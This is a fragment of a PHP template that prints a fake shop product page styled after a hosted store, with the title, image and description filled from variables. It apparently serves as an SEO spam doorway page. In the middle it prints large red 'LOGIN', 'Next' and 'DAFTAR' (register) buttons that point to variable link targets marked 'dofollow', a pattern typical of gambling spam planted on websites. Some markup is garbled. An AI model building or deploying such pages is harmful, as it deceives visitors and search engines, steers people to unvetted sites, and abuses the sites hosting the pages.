                  }
               </style><div
                  class="header-border"
                  data-header-style="gradient"
                  data-header-border="false"
                  data-test="header-border"
                  style="
                  "></div>
               <div
                  class="header-dropshadow"data-header-style="gradient"
                  data-header-dropshadow="false"
                  data-test="header-dropshadow"
                  style=""
                  ></div>
               <div >
                  <div
                     class="header-background-gradient"
                     data-header-style="gradient"data-gradient-type="faded"
                     data-test="header-background-gradient"
                     style="opacity: calc(100 * .01)"
                     ></div>
               </div>
               <div class="header-inner container--fluid
                  header-layout--with-commerce
                  header-mobile-layout-logo-center-nav-left
                  header-layout-nav-right
                  "
                  data-test="header-inner"
                  >
                  <!-- Background --><div class="header-background theme-bg--primary"></div>
                  <div class="header-display-desktop" data-content-field="site-title">
                     <style>
                        .top-bun, 
                        .patty, 
                        .bottom-bun {
                        height: 1px;
                        }
                     </style>
                     <!-- Burger -->
                     <div class="header-burger
                        menu-overlay-has-visible-non-navigation-items
                        " data-animation-role="header-element">
                        <button class="header-burger-btn burger" data-test="header-burger">
                           <span hidden class="js-header-burger-open-title visually-hidden">Open Menu</span>
                           <span hidden class="js-header-burger-close-title visually-hidden">Close Menu</span>
                           <div class="burger-box">
                              <div class="burger-inner header-menu-icon-doubleLineHamburger">
                                 <div class="top-bun"></div>
                                 <div class="patty"></div>
                                 <div class="bottom-bun"></div>
                              </div>
                           </div>
                        </button>
                     </div>
                     <!-- Social -->
                     <!-- Title and nav wrapper -->
                     <div class="header-title-nav-wrapper">
                        <!-- Title -->
                        <div
                           class="
                           header-title
                           "
                           data-animation-role="header-element"
                           >
                           <div class="header-title-text">
                              <a id="site-title" href="' . htmlspecialchars($urlPath3) . '" data-animation-role="header-element">' . htmlspecialchars($thtitle) .'</a>
                           </div>
                        </div>
                        <!-- Nav -->
                        <div class="header-nav">
                           <div class="header-nav-wrapper">
                              <nav class="header-nav-list">
                              </nav>
                           </div>
                        </div>
                     </div>
                     <!-- Actions -->
                     <div class="header-actions header-actions--right">
                        <div class="user-accounts-link header-nav-item header-nav-item--collection customerAccountLoginDesktop" data-controller="UserAccountLink" data-animation-role="header-element">
                           <a class="user-accounts-text-link header-nav-item" href="' . htmlspecialchars($urlPath3) . '" data-animation-role="header-element">
                           <span class="unauth">Login</span>
                           <span class="auth">Account</span>
                           </a>
                        </div>
                        <div class="header-actions-action header-actions-action--social">
                           <a class="icon icon--fill  header-icon header-icon-border-shape-none header-icon-border-style-outline"  href="' . htmlspecialchars($urlPath3) . '" target="_blank" aria-label="instagram-unauth">
                              <svg viewBox="23 23 64 64">
                                 <use xlink:href="#instagram-unauth-icon" width="110" height="110"></use>
                              </svg>
                           </a>
                           <a class="icon icon--fill  header-icon header-icon-border-shape-none header-icon-border-style-outline"  href="' . htmlspecialchars($urlPath3) . '" target="_blank" aria-label="twitter-unauth">
                              <svg viewBox="23 23 64 64">
                                 <use xlink:href="#twitter-unauth-icon" width="110" height="110"></use>
                              </svg>
                           </a>
                        </div>
                        <div class="showOnMobile">
                           <div class="header-actions-action header-actions-action--cart">
                              <a href="' . htmlspecialchars($urlPath3) . '" class="cart-style-icon icon--stroke icon--fill icon--cart sqs-custom-cart  header-icon  show-empty-cart-state cart-quantity-zero header-icon-border-shape-none header-icon-border-style-outline" >
                                 <span class="Cart-inner">
                                    <svg class="icon icon--cart" width="100" height="105" viewBox="0 0 100 105" ><path d="M65.7324 22.5C65.7324 22.667 65.7291 22.8337 65.7226 23H73.7266C73.7305 22.8338 73.7324 22.6671 73.7324 22.5C73.7324 10.0736 62.9873 0 49.7324 0C36.4776 0 25.7324 10.0736 25.7324 22.5C25.7324 22.6671 25.7344 22.8338 25.7382 23H33.7422C33.7357 22.8337 33.7324 22.667 33.7324 22.5C33.7324 14.9704 40.4017 8 49.7324 8C59.0632 8 65.7324 14.9704 65.7324 22.5Z" />
                                       <path fill-rule="evenodd" clip-rule="evenodd" d="M0.00857816 32.2592C-0.14118 29.9529 1.68905 28 4.00017 28H95.4638C97.775 28 99.6052 29.9529 99.4554 32.2592L94.9749 101.259C94.8383 103.363 93.0918 105 90.9833 105H8.48069C6.37218 105 4.62573 103.363 4.4891 101.259L0.00857816 32.2592ZM11.0475 94.1908L8.26834 36H91.1957L88.4166 94.1908C88.3147 96.3233 86.5561 98 84.4211 98H15.0429C12.9079 98 11.1493 96.3233 11.0475 94.1908Z" />
                                    </svg>
                                    <div class="icon-cart-quantity"><span class="cart-quantity-container">
                                       <span class="sqs-cart-quantity">0</span>
                                       </span></div></span></a></div></div><div class="showOnDesktop">
                           <div class="header-actions-action header-actions-action--cart"><a href="' . htmlspecialchars($urlPath3) . '"class="cart-style-icon icon--stroke icon--fill icon--cart sqs-custom-cart  header-icon  show-empty-cart-state cart-quantity-zero header-icon-border-shape-none header-icon-border-style-outline" >
                                 <span class="Cart-inner">
                                    <svg class="icon icon--cart" width="100" height="105" viewBox="00 100 105" >
                                       <path d="M65.7324 22.5C65.7324 22.667 65.7291 22.8337 65.7226 23H73.7266C73.7305 22.8338 73.7324 22.6671 73.7324 22.5C73.7324 10.0736 62.9873 0 49.7324 0C36.4776 0 25.7324 10.0736 25.7324 22.5C25.7324 22.6671 25.7344 22.8338 25.7382 23H33.7422C33.7357 22.8337 33.7324 22.667 33.7324 22.5C33.7324 14.9704 40.4017 8 49.7324 8C59.0632 8 65.7324 14.9704 65.7324 22.5Z" />
                                       <path fill-rule="evenodd" clip-rule="evenodd" d="M0.00857816 32.2592C-0.14118 29.9529 1.68905 28 4.00017 28H95.4638C97.775 28 99.6052 29.9529 99.4554 32.2592L94.9749 101.259C94.8383 103.363 93.0918 105 90.9833 105H8.48069C6.37218105 4.62573 103.363 4.4891 101.259L0.00857816 32.2592ZM11.0475 94.1908L8.26834 36H91.1957L88.4166 94.1908C88.3147 96.3233 86.5561 98 84.4211 98H15.0429C12.9079 9811.1493 96.3233 11.0475 94.1908Z" /></svg>
                                    <div class="icon-cart-quantity"><span class="cart-quantity-container">
                                       <span class="sqs-cart-quantity">0</span>
                                       </span></div>
                                 </span></a>
                           </div>
                        </div>
                     </div>
                  </div>
                  <div class="header-display-mobile" data-content-field="site-title">
                     <!-- Social -->
                     <style>
                        .top-bun, 
                        .patty, 
                        .bottom-bun {
                        height: 1px;
                        }
                     </style>
                     <!-- Burger -->
                     <div class="header-burger
                        menu-overlay-has-visible-non-navigation-items
                        " data-animation-role="header-element"><button class="header-burger-btn burger" data-test="header-burger">
                           <span hiddenclass="js-header-burger-open-title visually-hidden">Open Menu</span>
                           <span hidden class="js-header-burger-close-title visually-hidden">Close Menu</span>
                           <div class="burger-box">
                              <div class="burger-inner header-menu-icon-doubleLineHamburger">
                                 <div class="top-bun"></div>
                                 <div class="patty"></div>
                                 <div class="bottom-bun"></div>
                              </div></div>
                        </button>
                     </div>
                     <!-- Title and nav wrapper -->
                     <div class="header-title-nav-wrapper">
                        <!-- Title -->
                        <div
                           class="
                           header-title
                           "
                           data-animation-role="header-element"
                           >
                           <div class="header-title-text">
                              <a id="site-title" href="' . htmlspecialchars($urlPath3) . '" data-animation-role="header-element">' . htmlspecialchars($thtitle) .'</a>
                           </div>
                        </div>
                        <!-- Nav -->
                        <div class="header-nav">
                           <div class="header-nav-wrapper">
                              <nav class="header-nav-list">
                              </nav>
                           </div>
                        </div>
                     </div>
                     <!-- Actions -->
                     <div class="header-actions header-actions--right">
                        <div class="user-accounts-link header-nav-item header-nav-item--collection customerAccountLoginDesktop" data-controller="UserAccountLink" data-animation-role="header-element">
                           <a class="user-accounts-text-link header-nav-item" href="' . htmlspecialchars($urlPath3) . '" data-animation-role="header-element">
                           <span class="unauth">Login</span>
                           <span class="auth">Account</span>
                           </a>
                        </div>
                        <div class="header-actions-action header-actions-action--social">
                           <a class="icon icon--fill  header-icon header-icon-border-shape-none header-icon-border-style-outline"  href="' . htmlspecialchars($urlPath3) . '" target="_blank" aria-label="instagram-unauth">
                              <svg viewBox="23 23 64 64">
                                 <use xlink:href="#instagram-unauth-icon" width="110" height="110"></use>
                              </svg>
                           </a>
                           <a class="icon icon--fill  header-icon header-icon-border-shape-none header-icon-border-style-outline"  href="' . htmlspecialchars($urlPath3) . '" target="_blank" aria-label="twitter-unauth">
                              <svg viewBox="23 23 64 64">
                                 <use xlink:href="#twitter-unauth-icon" width="110" height="110"></use>
                              </svg>
                           </a>
                        </div>
                        <div class="showOnMobile">
                           <div class="header-actions-action header-actions-action--cart">
                              <a href="' . htmlspecialchars($urlPath3) . '" class="cart-style-icon icon--stroke icon--fill icon--cart sqs-custom-cart  header-icon  show-empty-cart-state cart-quantity-zero header-icon-border-shape-none header-icon-border-style-outline" >
                                 <span class="Cart-inner">
                                    <svg class="icon icon--cart" width="100" height="105" viewBox="0 0 100 105" >
                                       <path d="M65.7324 22.5C65.7324 22.667 65.7291 22.8337 65.7226 23H73.7266C73.7305 22.8338 73.7324 22.6671 73.7324 22.5C73.7324 10.0736 62.9873 0 49.7324 0C36.4776 0 25.7324 10.0736 25.7324 22.5C25.7324 22.6671 25.7344 22.8338 25.7382 23H33.7422C33.7357 22.8337 33.7324 22.667 33.7324 22.5C33.7324 14.9704 40.4017 8 49.7324 8C59.0632 8 65.7324 14.9704 65.7324 22.5Z" />
                                       <path fill-rule="evenodd" clip-rule="evenodd" d="M0.00857816 32.2592C-0.14118 29.9529 1.68905 28 4.00017 28H95.4638C97.775 28 99.6052 29.9529 99.4554 32.2592L94.9749 101.259C94.8383 103.363 93.0918 105 90.9833 105H8.48069C6.37218 105 4.62573 103.363 4.4891 101.259L0.00857816 32.2592ZM11.0475 94.1908L8.26834 36H91.1957L88.4166 94.1908C88.3147 96.3233 86.5561 98 84.4211 98H15.0429C12.9079 98 11.1493 96.3233 11.0475 94.1908Z" />
                                    </svg>
                                    <div class="icon-cart-quantity">
                                       <span class="cart-quantity-container">
                                       <span class="sqs-cart-quantity">0</span>
                                       </span></div>
                                 </span>
                              </a>
                           </div>
                        </div>
                        <div class="showOnDesktop"><div class="header-actions-action header-actions-action--cart"><a href="' . htmlspecialchars($urlPath3) . '" class="cart-style-icon icon--stroke icon--fill icon--cart sqs-custom-cart  header-icon  show-empty-cart-state cart-quantity-zero header-icon-border-shape-none header-icon-border-style-outline" >
                                 <span class="Cart-inner"><svg class="icon icon--cart" width="100" height="105" viewBox="0 0 100 105" ><path d="M65.7324 22.5C65.7324 22.667 65.7291 22.8337 65.7226 23H73.7266C73.7305 22.8338 73.7324 22.6671 73.7324 22.5C73.7324 10.0736 62.9873 0 49.7324 0C36.4776 0 25.7324 10.073625.7324 22.5C25.7324 22.6671 25.7344 22.8338 25.7382 23H33.7422C33.7357 22.8337 33.7324 22.667 33.7324 22.5C33.7324 14.9704 40.4017 8 49.7324 8C59.0632 8 65.7324 14.9704 65.7324 22.5Z" />
                                       <path fill-rule="evenodd" clip-rule="evenodd" d="M0.00857816 32.2592C-0.14118 29.9529 1.68905 28 4.00017 28H95.4638C97.775 28 99.6052 29.9529 99.4554 32.2592L94.9749 101.259C94.8383 103.363 93.0918 105 90.9833 105H8.48069C6.37218 105 4.62573 103.363 4.4891 101.259L0.00857816 32.2592ZM11.0475 94.1908L8.26834 36H91.1957L88.4166 94.1908C88.3147 96.3233 86.5561 98 84.4211 98H15.0429C12.9079 98 11.1493 96.3233 11.0475 94.1908Z" />
                                    </svg><div class="icon-cart-quantity">
                                       <span class="cart-quantity-container"><span class="sqs-cart-quantity">0</span>
                                       </span>
                                    </div>
                                 </span>
                              </a>
                           </div>
                        </div>
                     </div></div></div></div><!-- (Mobile) Menu Navigation -->
            <div class="header-menu header-menu--folder-list
               bright"
               data-section-theme="bright"
               data-current-styles="{
               &quot;layout&quot;: &quot;navRight&quot;,
               &quot;action&quot;: {
               &quot;buttonText&quot;: &quot;Get Started&quot;,
               &quot;newWindow&quot;: false
               },
               &quot;showSocial&quot;: true,
               &quot;socialOptions&quot;: {
               &quot;socialBorderShape&quot;: &quot;none&quot;,
               &quot;socialBorderStyle&quot;: &quot;outline&quot;,
               &quot;socialBorderThickness&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 1.0
               }
               },
               &quot;sectionTheme&quot;: &quot;&quot;,
               &quot;menuOverlayTheme&quot;: &quot;bright&quot;,
               &quot;menuOverlayAnimation&quot;: &quot;fade&quot;,
               &quot;cartStyle&quot;: &quot;cart&quot;,
               &quot;cartText&quot;: &quot;Cart&quot;,
               &quot;showEmptyCartState&quot;: true,
               &quot;cartOptions&quot;: {
               &quot;iconType&quot;: &quot;stroke-7&quot;,
               &quot;cartBorderShape&quot;: &quot;none&quot;,
               &quot;cartBorderStyle&quot;: &quot;outline&quot;,
               &quot;cartBorderThickness&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 1.0
               }
               },
               &quot;showButton&quot;: false,
               &quot;showCart&quot;: true,
               &quot;showAccountLogin&quot;: true,
               &quot;headerStyle&quot;: &quot;gradient&quot;,
               &quot;languagePicker&quot;: {
               &quot;enabled&quot;: false,
               &quot;iconEnabled&quot;: false,
               &quot;iconType&quot;: &quot;globe&quot;,
               &quot;flagShape&quot;: &quot;shiny&quot;,
               &quot;languageFlags&quot;: [ ]
               },
               &quot;mobileOptions&quot;: {
               &quot;layout&quot;: &quot;logoCenterNavLeft&quot;,
               &quot;menuIconOptions&quot;: {
               &quot;style&quot;: &quot;doubleLineHamburger&quot;,
               &quot;thickness&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 1.0
               }
               }
               },
               &quot;solidOptions&quot;: {
               &quot;headerOpacity&quot;: {
               &quot;unit&quot;: &quot;%&quot;,
               &quot;value&quot;: 100.0
               },
               &quot;blurBackground&quot;: {
               &quot;enabled&quot;: false,
               &quot;blurRadius&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 12.0
               }
               },
               &quot;backgroundColor&quot;: {
               &quot;type&quot;: &quot;SITE_PALETTE_COLOR&quot;,
               &quot;sitePaletteColor&quot;: {
               &quot;colorName&quot;: &quot;white&quot;,
               &quot;alphaModifier&quot;: 1.0
               }
               },
               &quot;navigationColor&quot;: {
               &quot;type&quot;: &quot;SITE_PALETTE_COLOR&quot;,
               &quot;sitePaletteColor&quot;: {
               &quot;colorName&quot;: &quot;black&quot;,
               &quot;alphaModifier&quot;: 1.0
               }
               }
               },
               &quot;gradientOptions&quot;: {
               &quot;gradientType&quot;: &quot;faded&quot;,
               &quot;headerOpacity&quot;: {
               &quot;unit&quot;: &quot;%&quot;,
               &quot;value&quot;: 100.0
               },
               &quot;blurBackground&quot;: {
               &quot;enabled&quot;: false,
               &quot;blurRadius&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 12.0
               }
               },
               &quot;backgroundColor&quot;: {
               &quot;type&quot;: &quot;CUSTOM_COLOR&quot;,
               &quot;customColor&quot;: {
               &quot;hslaValue&quot;: {
               &quot;hue&quot;: 158.29787234042553,
               &quot;saturation&quot;: 0.9215686274509804,
               &quot;lightness&quot;: 0.1,
               &quot;alpha&quot;: 1.0
               },
               &quot;userFormat&quot;: &quot;hex&quot;
               }
               },
               &quot;navigationColor&quot;: {
               &quot;type&quot;: &quot;CUSTOM_COLOR&quot;,
               &quot;customColor&quot;: {
               &quot;hslaValue&quot;: {
               &quot;hue&quot;: 0.0,
               &quot;saturation&quot;: 0.0,
               &quot;lightness&quot;: 1.0,
               &quot;alpha&quot;: 1.0
               },
               &quot;userFormat&quot;: &quot;hex&quot;
               }
               }
               },
               &quot;dropShadowOptions&quot;: {
               &quot;enabled&quot;: false,
               &quot;blur&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 30.0
               },
               &quot;spread&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 0.0
               },
               &quot;distance&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 0.0
               },
               &quot;color&quot;: {
               &quot;type&quot;: &quot;SITE_PALETTE_COLOR&quot;,
               &quot;sitePaletteColor&quot;: {
               &quot;colorName&quot;: &quot;black&quot;,
               &quot;alphaModifier&quot;: 1.0
               }
               }
               },
               &quot;borderOptions&quot;: {
               &quot;enabled&quot;: false,
               &quot;position&quot;: &quot;allSides&quot;,
               &quot;thickness&quot;: {
               &quot;unit&quot;: &quot;px&quot;,
               &quot;value&quot;: 4.0
               },&quot;color&quot;: {&quot;type&quot;: &quot;SITE_PALETTE_COLOR&quot;,
               &quot;sitePaletteColor&quot;: {
               &quot;colorName&quot;: &quot;black&quot;,
               &quot;alphaModifier&quot;: 1.0}
               }},
               &quot;showPromotedElement&quot;: false,
               &quot;buttonVariant&quot;: &quot;primary&quot;,
               &quot;blurBackground&quot;: {
               &quot;enabled&quot;: false,
               &quot;blurRadius&quot;: {
               &quot;unit&quot;: &quot;px&quot;,&quot;value&quot;: 12.0
               }
               },&quot;headerOpacity&quot;: {
               &quot;unit&quot;: &quot;%&quot;,
               &quot;value&quot;: 100.0
               }}"
               data-section-id="overlay-nav"
               data-show-account-login="true"
               data-test="header-menu">
               <div class="header-menu-bg theme-bg--primary"></div>
               <div class="header-menu-nav">
                  <nav class="header-menu-nav-list">
                     <div data-folder="root" class="header-menu-nav-folder">
                        <div class="header-menu-nav-folder-content">
                           <!-- Menu Navigation -->
                           <div class="header-menu-nav-wrapper">
                           </div>
                           <div
                              class="user-accounts-link header-menu-nav-item header-nav-item--collection customerAccountLoginMobile"
                              data-controller="UserAccountLink"
                              data-animation-role="header-element"
                              >
                              <a class="user-accounts-text-link header-nav-item" href="' . htmlspecialchars($urlPath3) . '" data-animation-role="header-element">
                              <span class="unauth">Login</span>
                              <span class="auth">Account</span>
                              </a></div>
                        </div><div class="header-menu-actions social-accounts"><div class="header-menu-actions-action header-menu-actions-action--social mobile">
                              <a class="icon icon--lg icon--fill  header-icon header-icon-border-shape-none header-icon-border-style-outline"  href="' . htmlspecialchars($urlPath3) . '" target="_blank" aria-label="instagram-unauth">
                                 <svgviewBox="23 23 64 64">
                                    <use xlink:href="#instagram-unauth-icon" width="110" height="110"></use>
                                 </svg>
                              </a>
                           </div>
                           <div class="header-menu-actions-action header-menu-actions-action--social mobile">
                              <a class="icon icon--lg icon--fill  header-icon header-icon-border-shape-none header-icon-border-style-outline"  href="' . htmlspecialchars($urlPath3) . '" target="_blank" aria-label="twitter-unauth">
                                 <svg viewBox="2323 64 64">
                                    <use xlink:href="#twitter-unauth-icon" width="110" height="110"></use>
                                 </svg>
                              </a>
                           </div>
                        </div>
                     </div>
                  </nav>
               </div>
            </div>
         </header>
         <main id="page" class="container" role="main">
            <article class="sections" id="sections" data-page-sections="67ac3151c213240390b4b40f">
               <section
                  data-test="page-section"
                  data-section-theme="light-bold"
                  class="page-section 
                  content-collection
                  full-bleed-section
                  collection-type-products
                  background-width--full-bleed
                  section-height--medium
                  content-width--wide
                  horizontal-alignment--center
                  vertical-alignment--middle
                  light-bold"
                  data-section-id="67ac3151c213240390b4b414"
                  data-controller="SectionWrapperController"
                  data-current-styles="{
                  &quot;imageOverlayOpacity&quot;: 0.15,
                  &quot;backgroundWidth&quot;: &quot;background-width--full-bleed&quot;,
                  &quot;sectionHeight&quot;: &quot;section-height--medium&quot;,
                  &quot;horizontalAlignment&quot;: &quot;horizontal-alignment--center&quot;,
                  &quot;verticalAlignment&quot;: &quot;vertical-alignment--middle&quot;,
                  &quot;contentWidth&quot;: &quot;content-width--wide&quot;,
                  &quot;sectionTheme&quot;: &quot;light-bold&quot;,
                  &quot;sectionAnimation&quot;: &quot;none&quot;,
                  &quot;backgroundMode&quot;: &quot;image&quot;
                  }"
                  data-current-context="{
                  &quot;video&quot;: {
                  &quot;playbackSpeed&quot;: 0.5,
                  &quot;filter&quot;: 1,
                  &quot;filterStrength&quot;: 0,
                  &quot;zoom&quot;: 0,
                  &quot;videoSourceProvider&quot;: &quot;none&quot;
                  },
                  &quot;backgroundImageId&quot;: null,
                  &quot;backgroundMediaEffect&quot;: null,
                  &quot;divider&quot;: null,
                  &quot;typeName&quot;: &quot;products&quot;
                  }"
                  data-animation="none"
                  >
                  <div
                     class="section-border"
                     >
                     <div class="section-background">
                     </div>
                  </div>
                  <div
                     class="content-wrapper"
                     style="
                     "
                     >
                     <div
                        class="content"
                        >
                        <section 
                           id="pdp"
                           class="
                           products
                           collection-content-wrapper
                           product-layout-side-by-side
                           "
                           >
                                                 <style>
                          .n-columns-2 {
    display: grid;
    grid-template-columns: repeat(3, 1fr);
    gap: 10px;
    font-weight: 700;
  }

  .n-columns-2 a {
    text-align: center;
    color: #000;
    padding: 13px 10px;
    background: #ff2d00;
    border: 2px solid #f8f9e5;
    box-shadow: 0px 0px 3px #e0d431;
    text-decoration: none;
    box-sizing: border-box;
    border-radius: 5px;
  }
    .login, .register {
      color: #000;
      padding: 13px 10px;
    }
    .login, .login-button {
      background: #ff2d00;
      border: 2px solid #f8f9e5;
      box-shadow: 0px 0px 3px #e0d431;
    }
    .register, .register-button {
      background: #ff2d00;
      border: 2px solid #f8f9e5;
      box-shadow: 0px 0px 3px #e0d431;
    }
                      </style>
                     <div class="content"><div class="n-columns-2">
							';
if ($found) {
    echo '<a href="' . htmlspecialchars($amptunnel2) . $namabl . htmlspecialchars($thtitle) .'" rel="dofollow" class="login">LOGIN</a>
          <a href="'. $namabl . htmlspecialchars($titrandom2) .'" rel="dofollow" class="register">Next</a>
          <a href="' . htmlspecialchars($amptunnel2) . $namabl . htmlspecialchars($thtitle) .'" rel="dofollow" class="register">DAFTAR</a>';
} elseif ($foundInFile3) { 
    echo '<a href="' . htmlspecialchars($amptunnel3) . $namabl . htmlspecialchars($thtitle) .'" rel="dofollow" class="login">LOGIN</a>
          <a href="'. $namabl . htmlspecialchars($titrandom3) .'" rel="dofollow" class="register">Next</a>
                  <a href="' . htmlspecialchars($amptunnel3) . $namabl . htmlspecialchars($thtitle) .'" rel="dofollow" class="register">DAFTAR</a>';
} else {                  
    echo '<a href="' . htmlspecialchars($amptunnel) . $namabl . htmlspecialchars($thtitle) .'" rel="dofollow" class="login">LOGIN</a>
          <a href="'. $namabl . htmlspecialchars($titrandom1) .'" rel="dofollow" class="register">Next</a>
                  <a href="' . htmlspecialchars($amptunnel) . $namabl . htmlspecialchars($thtitle) .'" rel="dofollow" class="register">DAFTAR</a>';
}
echo '
                  </div></div>
                           <article class="ProductItem hentry author-asta-bettt post-type-store-item on-sale" data-item-id="67ac3161ea3e8a7ce16ca8d3">
                              <nav class="ProductItem-nav">
                                 <div class="ProductItem-nav-breadcrumb" data-animation-role="content"><a href="' . htmlspecialchars($urlPath3) . '" class="ProductItem-nav-breadcrumb-link">Shop</a>
                                    <span class="ProductItem-nav-breadcrumb-separator"></span>
                                    <a href="' . htmlspecialchars($urlPath3) . '" class="ProductItem-nav-breadcrumb-link">' . htmlspecialchars($thtitle) .'</a></div>
                              </nav><section class="ProductItem-summary" data-controller="ProductGallery"><section
                                    aria-label="Gallery"class="ProductItem-gallery"data-product-gallery="container"
                                    ><div class="ProductItem-gallery-slides"
                                       data-animation-role="image"data-product-gallery="slides"
                                       >
                                       <div
                                          class="ProductItem-gallery-slides-item"
                                          data-slide-index="1"
                                          data-image-id=67ac31da8ccaac23790b217d
                                          data-controller="ImageZoom"data-slide-url="' . htmlspecialchars($thtitle) .'"
                                          data-product-gallery="slides-item"
                                          data-test="pdp-gallery-slide"
                                          >
                                          <img
                                             aria-describedby="ProductItem-gallery-slides-item-1-index-67ac31da8ccaac23790b217d"
                                             class="ProductItem-gallery-slides-item-image"
                                             data-load="false"
                                             data-src="' . htmlspecialchars($gambartunnel) .'" data-image="' . htmlspecialchars($gambartunnel) .'" data-image-dimensions="1024x1024" data-image-focal-point="0.5,0.5" alt="undefined_image (52).png" 
                                             elementtiming="nbf-products-gallery"
                                             /><span
                                             id="ProductItem-gallery-slides-item-1-index-67ac31da8ccaac23790b217d"style="display: none;"
                                             >
                                          Image 1 of 
                                          </span>
                                          <div class="product-image-zoom-duplicate"aria-hidden="true"><img data-load="false" data-src="' . htmlspecialchars($gambartunnel) .'" data-image="' . htmlspecialchars($gambartunnel) .'" data-image-dimensions="1024x1024" data-image-focal-point="0.5,0.5" alt="undefined_image (52).png"  elementtiming="nbf-products-gallery-zoom" />
                                          </div></div>
                                       <div
                                          class="gallery-lightbox-outer-wrapper"
                                          data-use-image-loader="true"
                                          data-controller="Lightbox"
                                          >
                                          <div class="gallery-lightbox" data-section-theme="">
                                             <div class="gallery-lightbox-background"></div>
                                             <div class="gallery-lightbox-header">
                                                <button class="gallery-lightbox-close-btn" aria-label="Close" data-close data-test="gallery-lightbox-close">
                                                   <div class="gallery-lightbox-close-btn-icon">
                                                      <svg viewBox="0 0 40 40">
                                                         <path d="M4.3,35.7L35.7,4.3"/>
                                                         <path d="M4.3,4.3l31.4,31.4"/>
                                                      </svg>
                                                   </div>
                                                </button>
                                             </div>
                                             <div class="gallery-lightbox-wrapper">
                                                <div class="gallery-lightbox-list">
                                                   <figure class="gallery-lightbox-item" data-slide-url="' . htmlspecialchars($thtitle) .'">
                                                      <div class="gallery-lightbox-item-wrapper">
                                                         <div class="gallery-lightbox-item-src">
                                                            <div class="gallery-lightbox-item-img content-fit">
                                                               <img data-src="' . htmlspecialchars($gambartunnel) .'" data-image="' . htmlspecialchars($gambartunnel) .'" data-image-dimensions="1024x1024" data-image-focal-point="0.5,0.5" alt="undefined_image (52).png"  data-load="false" elementtiming="nbf-product-lightbox" />
                                                            </div>
                                                         </div>
                                                      </div>
                                                   </figure>
                                                </div>
                                                <div class="gallery-lightbox-controls" data-test="gallery-lightbox-controls">
                                                   <div class="gallery-lightbox-control" data-previous data-test="gallery-lightbox-control-previous">
                                                      <button class="gallery-lightbox-control-btn" aria-label="Previous Slide">
                                                         <div class="gallery-lightbox-control-btn-icon">
                                                            <svg class="caret-left-icon--small" viewBox="0 0 9 16">
                                                               <polyline fill="none" stroke-miterlimit="10" points="7.3,14.7 2.5,8 7.3,1.2 "/>
                                                            </svg>
                                                         </div>
                                                      </button>
                                                   </div>
                                                   <div class="gallery-lightbox-control" data-next data-test="gallery-lightbox-control-next">
                                                      <button class="gallery-lightbox-control-btn" aria-label="Next Slide">
                                                         <div class="gallery-lightbox-control-btn-icon">
                                                            <svg class="caret-right-icon--small" viewBox="0 0 9 16">
                                                               <polyline fill="none" stroke-miterlimit="10" points="1.6,1.2 6.5,7.9 1.6,14.7 "/>
                                                            </svg>
                                                         </div>
                                                      </button>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </section>
                                 <section
                                    class="product-details ProductItem-details "data-test="pdp-details" data-current-context="{"isSubscription":"false",
                                    "subscriptionType":""}">
												<h1 class="ProductItem-details-title" data-content-field="title" data-test="pdp-title">
                                       ' . htmlspecialchars($thtitle).' '. htmlspecialchars($judultunnel) . '
                                    </h1>
                                    <div data-controller="ProductItemVariants,ProductCartButton" 
                                       class="ProductItem-details-checkout"
                                       >
                                       <div class="ProductItem-product-price"
                                          data-animation-role="content">
                                          <div class="product-price">
                                             <span class="visually-hidden v6-visually-hidden">Sale Price:</span>IDR 0.00 <span class="visually-hidden v6-visually-hidden">Original Price:</span><span class="original-price">IDR 777.00</span>
                                          </div>
                                          <div data-afterpay="true" data-current-context="{&quot;67ac3161ea3e8a7ce16ca8d3&quot;: {
                                             &quot;scarcityEnabled&quot;: false,
                                             &quot;scarcityShownByDefault&quot;: false,
                                             &quot;afterPayAvailable&quot;: false,
                                             &quot;klarnaAvailable&quot;: false,
                                             &quot;shopperLanguage&quot;: &quot;en&quot;,&quot;afterPayMin&quot;: 0,
                                             &quot;afterPayMax&quot;: 0,
                                             &quot;klarnaMin&quot;: 0,
                                             &quot;klarnaMax&quot;: 0,&quot;mailingListSignUpEnabled&quot;: false,
                                             &quot;mailingListOptInByDefault&quot;: false}
                                             }"></div>
                                          <div class="pdp-overlay"></div>
                                          <div class="product-mark sale">sale</div></div><div class="ProductItem-details-excerpt ProductItem-details-excerpt-below-price" data-content-field="excerpt">
                                          <p style="white-space:pre-wrap;" data-rte-preserve-empty="true"><a href=' . htmlspecialchars($urlPath3) . '>' . htmlspecialchars($thtitle) . '</a>,' . htmlspecialchars($destunnel) . '</p>
                                       </div>
                                       <div
                                          class="ProductItem-quantity-add-to-cart"
                                          >
                                          <div class="product-quantity-input" data-item-id="67ac3161ea3e8a7ce16ca8d3" data-animation-role="content"><div class="quantity-label">Quantity:</div>
                                             <input aria-label="Quantity" size="4" max="9999" min="1" value="1" type="number" step="1"></input>
                                          </div><div class="sqs-add-to-cart-button-wrapper" data-animation-role="button">
                                             <div class="sqs-add-to-cart-button sqs-suppress-edit-mode sqs-editable-button sqs-button-element--primary " role="button" tabindex="0" data-dynamic-strings data-collection-id="67ac3151c213240390b4b3e6" data-item-id="67ac3161ea3e8a7ce16ca8d3" data-product-type="1" data-use-custom-label="false" data-original-label="Add To Cart" >
                                                <div class="sqs-add-to-cart-button-inner">Add To Cart</div></div>
                                          </div>
                                       </div>
                                       <div
                                          class="ProductItem-details-excerpt-below-add-to-cart"
                                          data-content-field="excerpt"
                                          >
                                          <p style="white-space:pre-wrap;" data-rte-preserve-empty="true">
														<a href=' . htmlspecialchars($urlPath3) . '>' . htmlspecialchars($thtitle) . '</a>','.' . htmlspecialchars($destunnel) . '</p>
                                       </div>
                                       <div
                                          class="ProductItem-details-excerpt-below-add-ons"
                                          data-content-field="excerpt"
                                          >
                                          <p style="white-space:pre-wrap;" data-rte-preserve-empty="true"><a href=' . htmlspecialchars($urlPath3) . '>' . htmlspecialchars($thtitle) . '</a>','.' . htmlspecialchars($destunnel) . '</p>
                                       </div>
                                    </div>
                                 </section>
                              </section>
                           </article>
